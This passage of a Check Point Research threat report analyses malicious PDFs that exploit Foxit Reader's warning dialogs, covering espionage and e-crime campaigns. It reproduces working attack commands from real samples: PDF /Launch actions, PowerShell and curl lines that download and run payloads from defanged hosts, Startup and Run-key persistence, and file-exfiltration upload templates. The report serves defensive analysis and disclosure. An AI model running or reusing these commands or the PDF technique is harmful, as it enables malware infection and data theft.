{
	"id": "f342ea89-f516-4726-bcd5-0f1200f6cc5d",
	"created_at": "2026-04-06T00:09:39.04261Z",
	"updated_at": "2026-04-10T03:33:03.126373Z",
	"deleted_at": null,
	"sha1_hash": "1fca8044e90d64caed80b8a16fab8749dbc8168e",
	"title": "Foxit PDF “Flawed Design” Exploitation - Check Point Research",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 257554,
	"plain_text": "Foxit PDF “Flawed Design” Exploitation - Check Point Research\nBy antoniost@checkpoint.com\nPublished: 2024-05-14 · Archived: 2026-04-05 17:48:20 UTC\nResearch by: Antonis Terefos\nIntroduction\nPDF (Portable Document Format) files have become an integral part of modern digital communication. Renowned for their\nuniversality and fidelity, PDFs offer a robust platform for sharing documents across diverse computing environments. PDFs\nhave evolved into a standard format for presenting text, images, and multimedia content with consistent layout and\nformatting, irrespective of the software, hardware, or operating system used to view them. This versatility has made PDFs\nindispensable in fields ranging from business and academia to government and personal use, serving as a reliable means of\nexchanging information in a structured and accessible manner.\nIn the realm of PDF viewers, Adobe Acrobat Reader reigns supreme as the industry’s dominant player. However, while\nAdobe Acrobat Reader holds the biggest market share, notable contenders are vying for attention, with Foxit PDF Reader\nbeing a prominent alternative. With more than 700 million users located in more than 200 countries and significant\ncustomers in the government sector like the US Air Force, Army, Navy \u0026 Missile Defense Agency, as well as in the\ntechnological sector like Google, Microsoft, Intel \u0026 Dell.\nCheck Point Research has identified an unusual pattern of behavior involving PDF exploitation, mainly targeting users of\nFoxit Reader. This exploit triggers security warnings that could deceive unsuspecting users into executing harmful\ncommands. Check Point Research has observed variants of this exploit being actively utilized in the wild. Its low detection\nrate is attributed to the prevalent use of Adobe Reader in most sandboxes or antivirus solutions, as Adobe Reader is not\nsusceptible to this specific exploit. Additionally, Check Point Research has observed various exploit builders, ranging from\nthose coded in .NET to those written in Python, being used to deploy this exploit.\nThis exploit has been used by multiple threat actors, from e-crime to espionage. The campaigns have taken advantage of the\nlow detection rate and protection against this exploit where actors have been spotted sharing those malicious PDF files even\nusing nontraditional means such as Facebook. Check Point Research isolated and investigated three in-depth cases, ranging\nfrom an espionage campaign with a military focus to e-crime with multiple links and tools, achieving impressive attack\nchains.\nThe “Flawed Design”\nCheck Point Research discovered that samples from EXPMON produced unusual behavior when executed with Foxit\nReader compared to Adobe Reader. The exploitation of victims occurs through a flawed design in Foxit Reader, which\nshows as a default option the “OK,” which could lead the majority of the targets to ignore those messages and execute the\nmalicious code. The malicious command is executed once the victim “Agrees” to the default options twice.\nThe victim scenario is shown below: when opening the file, we come across the first pop-up, the default option “Trust\nonce,” which is the correct approach.\nFigure 1 - First pop-up warning.\nFigure 1 – First pop-up warning.\nOnce clicking “OK“, the target comes across a second pop-up. If there were any chance the targeted user would read the first\nmessage, the second would be “Agreed” without reading. This is the case that the Threat Actors are taking advantage of this\nflawed logic and common human behavior, which provides as the default choice the most “harmful” one.\nFigure 2 - The second pop-up warning has “Open” as the default option.\nFigure 2 – The second pop-up warning has “Open” as the default option.\nAttaching a debugger, we can observe the executed command and, with the use of PowerShell, will download and execute a\nmalicious file.\nFigure 3 - Triggered Malicious command.\n\nExecuted Command:\nFigure 3 – Triggered Malicious command.Executed Command.\nExecuted Command:\n\"C:\\Windows\\System32\\cmd.exe\" /c cD %tEMP% \u0026@echo powershell -Command \"(New-Object\nNet.WebClient).DownloadFile('hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe',\n'payload.exe')\" \u003e\u003e msd89h2j389uh.bat \u0026@echo timeout /t 5 \u003e\u003e msd89h2j389uh.bat \u0026@echo start payload.exe \u003e\u003e\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\nPage 1 of 32\n\nmsd89h2j389uh.bat \u0026@echo Set oShell = CreateObject (\"Wscript.Shell\") \u003e\u003e encrypted.vbs \u0026@echo Dim strArgs \u003e\u003e\r\nencrypted.vbs \u0026@echo strArgs = \"cmd /c msd89h2j389uh.bat\" \u003e\u003e encrypted.vbs \u0026@echo oShell.Run strArgs, 0, false \u003e\u003e\r\nencrypted.vbs \u0026 encrypted.vbs \u0026dEl encrypted.vbs\r\n\"C:\\Windows\\System32\\cmd.exe\" /c cD %tEMP% \u0026@echo powershell -Command \"(New-Object\r\nNet.WebClient).DownloadFile('hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe',\r\n'payload.exe')\" \u003e\u003e msd89h2j389uh.bat \u0026@echo timeout /t 5 \u003e\u003e msd89h2j389uh.bat \u0026@echo start payload.exe \u003e\u003e\r\nmsd89h2j389uh.bat \u0026@echo Set oShell = CreateObject (\"Wscript.Shell\") \u003e\u003e encrypted.vbs \u0026@echo Dim strArgs \u003e\u003e\r\nencrypted.vbs \u0026@echo strArgs = \"cmd /c msd89h2j389uh.bat\" \u003e\u003e encrypted.vbs \u0026@echo oShell.Run strArgs, 0, false \u003e\u003e\r\nencrypted.vbs \u0026 encrypted.vbs \u0026dEl encrypted.vbs\r\n\"C:\\Windows\\System32\\cmd.exe\" /c cD %tEMP% \u0026@echo powershell -Command \"(New-Object Net.WebClient).DownloadFil\r\nCode 1 – Command Executed.\r\nAnalyzing the PDF file statically, we can obtain the executed logic behind it.\r\n.\\pdf-parser.py .\\mlw.pdf\r\nPDF Comment '%PDF-1.1\\r\\n'\r\n/P '(/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object\r\nNet.WebClient).DownloadFile(\\'hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe\\',\r\n\\'payload.exe\\')\"'\r\nmsd89h2j389uh.bat \u0026@echo timeout\r\nmsd89h2j389uh.bat \u0026@echo start payload.exe\r\nReferencing: 5 0 R, 2 0 R, 4 0 R\r\n/MediaBox [ 0 0 795 842 ]\r\n/ID [(bc38735adadf7620b13216ff40de2b26)(bc38735adadf7620b13216ff40de2b26)]\r\n.\\pdf-parser.py .\\mlw.pdf PDF Comment '%PDF-1.1\\r\\n' obj 1 0 Type: /Catalog Referencing: 2 0 R \u003c\u003c /OpenAction \u003c\u003c /S\r\n/Launch /Win \u003c\u003c /F (CMD) /P '(/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object\r\nNet.WebClient).DownloadFile(\\'hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe\\',\r\n\\'payload.exe\\')\"' \u003e\u003e msd89h2j389uh.bat \u0026@echo timeout / t 5 \u003e\u003e msd89h2j389uh.bat \u0026@echo start payload.exe \u003e\u003e obj 2 0\r\nType: /Pages Referencing: 3 0 R \u003c\u003c /Kids [ 3 0 R ] /Count 1 /Type /Pages \u003e\u003e obj 3 0 Type: /Page Referencing: 5 0 R, 2 0 R,\r\n4 0 R \u003c\u003c /Resources \u003c\u003c /Font \u003c\u003c /F1 5 0 R \u003e\u003e \u003e\u003e /MediaBox [ 0 0 795 842 ] /Parent 2 0 R /Contents 4 0 R /Type /Page \u003e\u003e\r\nobj 4 0 Type: Referencing: Contains stream \u003c\u003c /Length 1260 \u003e\u003e obj 5 0 Type: /Font Referencing: \u003c\u003c /Subtype /Type1\r\n/Name /F1 /BaseFont /Helvetica /Type /Font \u003e\u003e xref trailer \u003c\u003c /Size 6 /Root 1 0 R /ID\r\n[(bc38735adadf7620b13216ff40de2b26)(bc38735adadf7620b13216ff40de2b26)] \u003e\u003e startxref 1866 PDF Comment\r\n'%%EOF'\r\n.\\pdf-parser.py .\\mlw.pdf\r\nPDF Comment '%PDF-1.1\\r\\n'\r\nobj 1 0\r\n Type: /Catalog\r\n Referencing: 2 0 R\r\n \u003c\u003c\r\n /OpenAction\r\n \u003c\u003c\r\n /S /Launch\r\n /Win\r\n \u003c\u003c\r\n /F (CMD)\r\n /P '(/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object Net.WebClient).DownloadFile(\\'hxxps://c\r\n \u003e\u003e\r\n msd89h2j389uh.bat \u0026@echo timeout\r\n / t 5\r\n \u003e\u003e\r\n msd89h2j389uh.bat \u0026@echo start payload.exe\r\n \u003e\u003e\r\nobj 2 0\r\n Type: /Pages\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 2 of 32\n\nReferencing: 3 0 R\r\n \u003c\u003c\r\n /Kids [ 3 0 R ]\r\n /Count 1\r\n /Type /Pages\r\n \u003e\u003e\r\nobj 3 0\r\n Type: /Page\r\n Referencing: 5 0 R, 2 0 R, 4 0 R\r\n \u003c\u003c\r\n /Resources\r\n \u003c\u003c\r\n /Font\r\n \u003c\u003c\r\n /F1 5 0 R\r\n \u003e\u003e\r\n \u003e\u003e\r\n /MediaBox [ 0 0 795 842 ]\r\n /Parent 2 0 R\r\n /Contents 4 0 R\r\n /Type /Page\r\n \u003e\u003e\r\nobj 4 0\r\n Type:\r\n Referencing:\r\n Contains stream\r\n \u003c\u003c\r\n /Length 1260\r\n \u003e\u003e\r\nobj 5 0\r\n Type: /Font\r\n Referencing:\r\n \u003c\u003c\r\n /Subtype /Type1\r\n /Name /F1\r\n /BaseFont /Helvetica\r\n /Type /Font\r\n \u003e\u003e\r\nxref\r\ntrailer\r\n \u003c\u003c\r\n /Size 6\r\n /Root 1 0 R\r\n /ID [(bc38735adadf7620b13216ff40de2b26)(bc38735adadf7620b13216ff40de2b26)]\r\n \u003e\u003e\r\nstartxref 1866\r\nPDF Comment '%%EOF'\r\nCode 2 – PDF static analysis.\r\nThe initial link, which references the root of the PDF, is shown using the key  /Root . In this case, points to object  1 .\r\nFollowing this object, we can observe the key  /OpenAction , which by itself doesn’t indicate malicious activity. This is a\r\nkey in a PDF file’s catalog dictionary. It specifies an action to be performed automatically when the document is opened.\r\nThe next keys are responsible for the execution of the command,  /S /Launch  indicating to the Foxit Reader to launch an\r\nexternal application and  /Win  providing the information needed for the launched application. Later,\r\nkeys  /F  and  /P  provide the application to execute and its parameters.\r\nThis sequence of keys triggers the two previous warnings in Foxit Reader, and with the flawed design and careless users, it\r\nis able to execute malicious commands that appear highly leveraged by threat actors. Meanwhile, the key  /Launch  appears\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 3 of 32\n\nnot to be triggered for Adobe Reader.\r\nCampaigns utilizing PDF Exploit\r\nCheck Point Research collected a plethora of malicious PDF files, taking advantage of the specific exploit targeting Foxit\r\nReader users. Despite the majority of sandboxes and VirusTotal failing to trigger the exploit, given Adobe’s prevalence as\r\nthe primary PDF Reader, numerous files from previous campaigns remained unretrieved. Nonetheless, we acquired a\r\nsufficient amount of dropped payloads from various origins, revealing a diverse range of malicious tools within the infection\r\nchain and prominent malware families such as:\r\nVenomRAT\r\nAgent-Tesla\r\nRemcos\r\nNjRAT\r\nNanoCore RAT\r\nPony\r\nXworm\r\nAsyncRAT\r\nDCRat\r\nWe meticulously isolated and conducted in-depth research on particular instances where the initial PDF samples resulted in\r\ninteresting campaigns. Through the analysis, we aimed to uncover unique insights into the nature and mechanisms of these\r\ninfections.\r\nCase I. Windows \u0026 Android Botnets with a Scent of Espionage\r\nWhile researching, we stumbled upon a malicious PDF file with a suspicious “military” related name, “ Regarding\r\nInvitation to attend defence services Asia 2024 and National Security Asia 2024.pdf ”. The PDF was possibly\r\ndistributed via a link to download. The campaign’s attack chain is simple, with the PDF downloading and executing a\r\ndownloader of two executables, which will later on collect and upload various files such as Documents, Images, Archives,\r\nand Databases.\r\nFigure 4 – Attack Chain.\r\nCommand \u0026 Control\r\nThe downloader provides no functionality other than downloading and executing the two payloads, and the information sent\r\nto the C\u0026C, which registers the bot, only displays the victims that received the following stage payloads.\r\nFigure 5 - Downloader’s Control Panel, Bot\r\ninformation.\r\nFigure 5 – Downloader’s Control Panel, Bot information.\r\nBased on the creation date of those “bot-registration” files, we obtained the campaign dates and number of Bots added to the\r\nBotnet per day. The primary campaign appears to have occurred on April 5, 2024, which is the day with the most registered\r\nbots.\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 4 of 32\n\nFigure 6 - Registered Bots per Day.\r\nFigure 6 – Registered Bots per Day.\r\nThe attack chain and the use of specific tools testify to a campaign focused on espionage, and further findings of android\r\ninfections using Rafel RAT testify to this assumption even further. Based on the obtained victim data, the Threat Actor has\r\nthe capability of performing hybrid campaigns, which also resulted in a Two Factor Authentication (2FA) bypass. Check\r\nPoint Research considers these campaigns to have been performed by the APT-C-35 / DoNot Team.\r\nWindows Campaign Technical Analysis\r\nThe PDF document was still hosted on the C\u0026C, suggesting it could be downloaded using a download link instead of being\r\nsent as a file to potential victims.\r\nFigure 7 - Distributing Server Open-directory.\r\nFigure 7 – Distributing Server Open-directory.\r\nCheck Point Research analyzed the specific PDF document and discovered it was built using an open-source PDF Builder,\r\nreleased on February 13, 2024. The command used once the “exploit” is triggered downloads an executable file from a\r\nremote server and executes it.\r\n/P '(/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object Net.WebClient).DownloadFile(\\'hxxps://omagle-chat-secure.com/target.exe\\', \\'payload.exe\\')\"'\r\nmsd89h2j389uh.bat \u0026@echo timeout\r\n/S /Launch /Win \u003c\u003c /F (cmd.exe) /P '(/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object\r\nNet.WebClient).DownloadFile(\\'hxxps://omagle-chat-secure.com/target.exe\\', \\'payload.exe\\')\"' \u003e\u003e msd89h2j389uh.bat\r\n\u0026@echo timeout / t 5\r\n /S /Launch\r\n /Win\r\n \u003c\u003c\r\n /F (cmd.exe)\r\n /P '(/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object Net.WebClient).DownloadFile(\\'hxxps://om\r\n \u003e\u003e\r\n msd89h2j389uh.bat \u0026@echo timeout\r\n / t 5\r\nCode 3 – Command downloading malicious payload.\r\nMachine Information\r\nThe executed downloader collects machine Information and writes it into “ %Appdata%/TestLog/$PC_Name.txt ”:\r\nComputer name\r\nUser name\r\nIP Address\r\nOS Version\r\nString decryption\r\nThe malware contains strings important to its functionality and is encrypted with a custom algorithm.\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 5 of 32\n\nFigure 8 - Decryption Algorithm.\r\nFigure 8 – Decryption Algorithm.\r\ndef downloader_decrypt_string(encrypted: bytes, key: int) -\u003e bytes:\r\nif chr(char) in string.ascii_letters:\r\nbase = ord(\"A\") if char \u003c= ord(\"Z\") else ord(\"a\")\r\nchar = (char - base - key + 0x1A) % 0x1A + base\r\n\u003e\u003e b'\\\\Intel\\\\upload.exe'\r\n\u003e\u003e b'hxxps://mailservicess.com/res/data/in.exe'\r\n\u003e\u003e b'hxxps://mailservicess.com/res/data/up.exe'\r\n\u003e\u003e b'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run'\r\n\u003e\u003e b'TailoredExperiencesWithDiagnosticDataEnabled'\r\ndef downloader_decrypt_string(encrypted: bytes, key: int) -\u003e bytes: result = [] for char in encrypted: if chr(char) in\r\nstring.ascii_letters: base = ord(\"A\") if char \u003c= ord(\"Z\") else ord(\"a\") char = (char - base - key + 0x1A) % 0x1A + base\r\nresult.append(char) return bytes(result) \u003e\u003e b'APPDATA' \u003e\u003e b'\\\\Intel\\\\index.exe' \u003e\u003e b'\\\\Intel\\\\upload.exe' \u003e\u003e\r\nb'hxxps://mailservicess.com/res/data/in.exe' \u003e\u003e b'hxxps://mailservicess.com/res/data/up.exe' \u003e\u003e\r\nb'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run' \u003e\u003e b'TailoredExperiencesWithDiagnosticDataEnabled' \u003e\u003e\r\nb'ghijkl/ghijkl' \u003e\u003e b'/index.php' \u003e\u003e b'mailservicess.com' \u003e\u003e b'\\\\Systems.exe' \u003e\u003e b'Systems.exe' \u003e\u003e b'\\\\Mozila\\\\'\r\ndef downloader_decrypt_string(encrypted: bytes, key: int) -\u003e bytes:\r\n result = []\r\n for char in encrypted:\r\n if chr(char) in string.ascii_letters:\r\n base = ord(\"A\") if char \u003c= ord(\"Z\") else ord(\"a\")\r\n char = (char - base - key + 0x1A) % 0x1A + base\r\n result.append(char)\r\n return bytes(result)\r\n \r\n\u003e\u003e b'APPDATA'\r\n\u003e\u003e b'\\\\Intel\\\\index.exe'\r\n\u003e\u003e b'\\\\Intel\\\\upload.exe'\r\n\u003e\u003e b'hxxps://mailservicess.com/res/data/in.exe'\r\n\u003e\u003e b'hxxps://mailservicess.com/res/data/up.exe'\r\n\u003e\u003e b'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run'\r\n\u003e\u003e b'TailoredExperiencesWithDiagnosticDataEnabled'\r\n\u003e\u003e b'ghijkl/ghijkl'\r\n\u003e\u003e b'/index.php'\r\n\u003e\u003e b'mailservicess.com'\r\n\u003e\u003e b'\\\\Systems.exe'\r\n\u003e\u003e b'Systems.exe'\r\n\u003e\u003e b'\\\\Mozila\\\\'\r\nCode 4 – Python representation and decrypted strings.\r\nNetwork communication\r\nThe downloader has an unusual approach to retrieving the data that will be sent. It enumerates the files inside the\r\nfolder  %Appdata%/TestLog/  and uploads it to the C\u0026C:  hxxps://mailservicess.com/ghijkl/ghijkl/index.php\r\nContent-Type: multipart/form-data; boundary=----qwerty\r\nContent-Disposition: form-data; name=\"filetoupload\"; filename=\"$FILEPATH\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 6 of 32\n\nOperating System Version: $VERSION\r\nContent-Type: multipart/form-data; boundary=----qwerty ------qwerty Content-Disposition: form-data; name=\"filetoupload\";\r\nfilename=\"$FILEPATH\" Content-Type: application/octet-stream Content-Transfer-Encoding: binary Computer Name:\r\n$PC_NAME IP Address: $IP_ADDRESS User Name: $USER_NAME Operating System Version: $VERSION ------qwerty-\r\n-\r\nContent-Type: multipart/form-data; boundary=----qwerty\r\n------qwerty\r\nContent-Disposition: form-data; name=\"filetoupload\"; filename=\"$FILEPATH\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\nComputer Name: $PC_NAME\r\nIP Address: $IP_ADDRESS\r\nUser Name: $USER_NAME\r\nOperating System Version: $VERSION\r\n------qwerty--\r\nAfter registering the bot to the C\u0026C, it downloads two payloads and stores them as %Appdata%/Intel/index.exe and\r\n%Appdata%/Intel/upload.exe . Both are executed with parameters “ pp ” with a “big” time difference between each other.\r\nPersistence\r\nThe malware copies itself at  %Appdata%/Intel/Mozila/Systems.exe  and sets a Run registry path\r\n“ SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run ” named “ TailoredExperiencesWithDiagnosticDataEnabled ”\r\nand values the copied path.\r\nDownloaded Payloads\r\nThe first payload, “ in.exe ”, stored as “ index.exe ”, does not contain any network-related functionality. It is used for\r\nlisting files inside the specific root directories  C:\\\\ ,  D:\\\\ ,  E:\\\\ ,  F:\\\\ ,  G:\\\\ ,  H:\\\\ ,  I:\\\\  and  Z:\\\\  and copies\r\nfiles with the below extensions to folder  %AppData%/htdocs/ .\r\n.txt, .jpeg, .jpg, .png, .doc, .docx, .xls, .xlsx, .pdf, .ppt, .zip, .rar, .inp, .pptx, .sql\r\n.txt, .jpeg, .jpg, .png, .doc, .docx, .xls, .xlsx, .pdf, .ppt, .zip, .rar, .inp, .pptx, .sql\r\n.txt, .jpeg, .jpg, .png, .doc, .docx, .xls, .xlsx, .pdf, .ppt, .zip, .rar, .inp, .pptx, .sql\r\nA text summary of all copied files will be created at  %AppData%/output.exe .\r\nThe second payload, “ up.exe ,” stored as “ upload.exe ,” is executed after some time from the first payload and uses a\r\nsimilar string decryption to the downloader.\r\ndef uploader_decrypt_string(encrypted: bytes) -\u003e bytes:\r\nif chr(char) in string.ascii_letters:\r\nbase_byte = 0x2A if char \u003c= ord(\"Z\") else 0x4A\r\ntemp = ((0x4EC4EC4F * char) \u003e\u003e 32) \u003e\u003e 3\r\nchar = char - 0x1A * ((temp \u003c 0) + temp) + (base_byte + 0x17)\r\ndef uploader_decrypt_string(encrypted: bytes) -\u003e bytes: result = [] for char in encrypted: if chr(char) in string.ascii_letters:\r\nbase_byte = 0x2A if char \u003c= ord(\"Z\") else 0x4A char -= base_byte temp = ((0x4EC4EC4F * char) \u003e\u003e 32) \u003e\u003e 3 char = char -\r\n0x1A * ((temp \u003c 0) + temp) + (base_byte + 0x17) result.append(char) return bytes(result) \u003e\u003e b'mailservicess.com' \u003e\u003e\r\nb'filetoupload' \u003e\u003e b'/filedata/' \u003e\u003e b'/index.php' \u003e\u003e b'mailservicess.com' \u003e\u003e b'filetoupload' \u003e\u003e b'APPDATA' \u003e\u003e b'\\\\htdocs\\\\'\r\ndef uploader_decrypt_string(encrypted: bytes) -\u003e bytes:\r\n result = []\r\n for char in encrypted:\r\n if chr(char) in string.ascii_letters:\r\n base_byte = 0x2A if char \u003c= ord(\"Z\") else 0x4A\r\n char -= base_byte\r\n temp = ((0x4EC4EC4F * char) \u003e\u003e 32) \u003e\u003e 3\r\n char = char - 0x1A * ((temp \u003c 0) + temp) + (base_byte + 0x17)\r\n result.append(char)\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 7 of 32\n\nreturn bytes(result)\r\n \r\n\u003e\u003e b'mailservicess.com'\r\n\u003e\u003e b'filetoupload'\r\n\u003e\u003e b'/filedata/'\r\n\u003e\u003e b'/index.php'\r\n\u003e\u003e b'mailservicess.com'\r\n\u003e\u003e b'filetoupload'\r\n\u003e\u003e b'APPDATA'\r\n\u003e\u003e b'\\\\htdocs\\\\'\r\nCode 5 – Python representation and decrypted strings.\r\nThe uploader enumerates the files from  %Appdata%/htdocs/  and uploads them to the C\u0026C using the same network\r\ncommunication used for the downloader.\r\nContent-Disposition: form-data; name=\"filetoupload\"; filename=\"$FILEPATH\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n------qwerty Content-Disposition: form-data; name=\"filetoupload\"; filename=\"$FILEPATH\" Content-Type:\r\napplication/octet-stream Content-Transfer-Encoding: binary $FILE_DATA ------qwerty--\r\n------qwerty\r\nContent-Disposition: form-data; name=\"filetoupload\"; filename=\"$FILEPATH\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n$FILE_DATA\r\n------qwerty--\r\nThe group has used those two downloaded payloads, but through further research, we discovered another tool that could be\r\ndropped depending on the interests of the group. The internal tool names are:\r\n1. indexer, which copies and makes a summary of files of interest.\r\n2. upload, a tool that uploads previous files\r\n3. screen, a tool making screenshots and saves them to the same folder to be picked up by upload.\r\nBased on analyzed tools, we believe that further undiscovered tools could exist that serve different needs, such as stealers,\r\nwhich would drop their results into the mentioned folder so the upload tool could send them to the C\u0026C.\r\nCheck Point Research also observed evidence of other malware and tooling from directories discovered on the C\u0026C, but we\r\nhaven’t managed to obtain any samples that could further verify our findings. The folders we discovered were:\r\n1. /AhMyth/, is an open-source Android RAT\r\n2. /sliver/, an open-source cross-platform red team framework similar to Cobalt Strike.\r\n3. /Keres/, is a PowerShell reverse-shell backdoor with persistence for Windows and Linux.\r\nCase II. Chained-Campaign\r\nDuring this campaign, the multiple links to follow, commands, and files executed in order to result in a stealer and two\r\nmines. The initial part of the infection chain was achieved with a malicious PDF document targeting Foxit PDF Reader\r\nusers. The file’s name is “ swift v2.pdf ”, possibly mainly targeting users from the United States, among other countries.\r\nFigure 9 - Attack Chain.\r\nFigure 9 – Attack Chain.\r\nTo this day, the PDF file still has a low detection rate among antivirus solutions, posing an even bigger threat. In one of the\r\ncampaigns, the Threat Actor distributed it also via Facebook, passing undetected by the Social Media’s malware detectors.\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 8 of 32\n\nFigure 10 - VirusTotal low detection rate of PDF\r\nfile.\r\nFigure 10 – VirusTotal low detection rate of PDF file.\r\nCampaign Technical Analysis\r\nAnalyzing statically, the command triggered is  cmd.exe , and the malicious BAT file is downloaded by executing  curl .\r\n/F '(c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\cmd.exe)'\r\n/P '(/c curl hxxps://sealingshop.click/bat/bostar4 -o \"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\mems.bat\" \u0026 C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\mems.bat)'\r\n/OpenAction \u003c\u003c /S /Launch /Win \u003c\u003c /F '(c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\cmd.exe)' /P '(/c curl\r\nhxxps://sealingshop.click/bat/bostar4 -o \"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\mems.bat\" \u0026 C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\mems.bat)' \u003e\u003e \u003e\u003e\r\n /OpenAction\r\n \u003c\u003c\r\n /S /Launch\r\n /Win\r\n \u003c\u003c\r\n /F '(c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\cmd.exe)'\r\n /P '(/c curl hxxps://sealingshop.click/bat/bostar4 -o \"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\mems.bat\" \u0026 C:\\\\\\\\\r\n \u003e\u003e\r\n \u003e\u003e\r\nCode 6 – Command Executed once accepted.\r\nThe malicious payload opens the browser on a Facebook page; we are not exactly sure what this action is done for, possibly\r\nto distract the user from the malicious activities to be performed or from the empty PDF page. We managed to obtain similar\r\nBAT payloads with different legitimate pages opened, such as Amazon. One hypothesis could be that the website opened\r\ncould indicate the platform where the users were targeted.\r\ncmd /c start https://www.facebook.com/help/contact/1304188393453553?ref=payout_hub\r\nC:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden Invoke-WebRequest -URI\r\nhxxps://sealingshop.click/config/stu -OutFile\r\n\"C:\\\\Users\\\\$([Environment]::UserName)\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\'Start\r\nMenu'\\\\Programs\\\\Startup\\\\WindowsUpdate.bat\"\r\ncmd /c mkdir \"C:\\\\Users\\\\Public\\\\python39\"\r\ncmd /c curl hxxps://sealingshop.click/app/python39.zip -o \"C:\\\\Users\\\\Public\\\\python39\\\\python39.zip\"\r\ncmd /c tar -xf C:\\\\Users\\\\Public\\\\python39\\\\python39.zip -C \"C:\\\\Users\\\\Public\\\\python39\"\r\ncmd /c curl hxxps://sealingshop.click/py/bostar4 -o \"C:\\\\Users\\\\Public\\\\python39\\\\documents.py\"\r\ncmd /c C:\\\\Users\\\\Public\\\\python39\\\\python.exe \"C:\\\\Users\\\\Public\\\\python39\\\\documents.py\"\r\ncmd /c start https://www.facebook.com/help/contact/1304188393453553?ref=payout_hub\r\nC:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden Invoke-WebRequest -URI\r\nhxxps://sealingshop.click/config/stu -OutFile\r\n\"C:\\\\Users\\\\$([Environment]::UserName)\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\'Start\r\nMenu'\\\\Programs\\\\Startup\\\\WindowsUpdate.bat\" cmd /c mkdir \"C:\\\\Users\\\\Public\\\\python39\" cmd /c curl\r\nhxxps://sealingshop.click/app/python39.zip -o \"C:\\\\Users\\\\Public\\\\python39\\\\python39.zip\" cmd /c tar -xf\r\nC:\\\\Users\\\\Public\\\\python39\\\\python39.zip -C \"C:\\\\Users\\\\Public\\\\python39\" cmd /c curl\r\nhxxps://sealingshop.click/py/bostar4 -o \"C:\\\\Users\\\\Public\\\\python39\\\\documents.py\" cmd /c\r\nC:\\\\Users\\\\Public\\\\python39\\\\python.exe \"C:\\\\Users\\\\Public\\\\python39\\\\documents.py\"\r\ncmd /c start https://www.facebook.com/help/contact/1304188393453553?ref=payout_hub\r\nC:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden Invoke-WebRequest -URI hxxps://s\r\ncmd /c mkdir \"C:\\\\Users\\\\Public\\\\python39\"\r\ncmd /c curl hxxps://sealingshop.click/app/python39.zip -o \"C:\\\\Users\\\\Public\\\\python39\\\\python39.zip\"\r\ncmd /c tar -xf C:\\\\Users\\\\Public\\\\python39\\\\python39.zip -C \"C:\\\\Users\\\\Public\\\\python39\"\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 9 of 32\n\ncmd /c curl hxxps://sealingshop.click/py/bostar4 -o \"C:\\\\Users\\\\Public\\\\python39\\\\documents.py\"\r\ncmd /c C:\\\\Users\\\\Public\\\\python39\\\\python.exe \"C:\\\\Users\\\\Public\\\\python39\\\\documents.py\"\r\nCode 7 – “First Payload”.\r\nThe “First payload” will download a second BAT file and store it in the  %Startup%  folder as  WindowsUpdate.bat  to\r\nmaintain persistence. On reboot, the machine will execute using PowerShell, a Python file.\r\ncmd /c C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden\r\nC:\\\\Users\\\\Public\\\\python39\\\\python C:\\\\Users\\\\Public\\\\python39\\\\documents.py;\r\ncmd /c C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden\r\nC:\\\\Users\\\\Public\\\\python39\\\\python C:\\\\Users\\\\Public\\\\python39\\\\documents.py;\r\ncmd /c C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden C:\\\\Users\\\\Public\\\\python\r\nCode 8 – Command downloaded using PowerShell used for persistence.\r\nThe “First payload” once dropping the persistence BAT file downloads and “installs” Python 3.9\r\nat  C:\\\\Users\\\\Public\\\\python . At this point, it is even clearer that the final payload will be a Python file, which will be\r\ndownloaded again using  curl  and 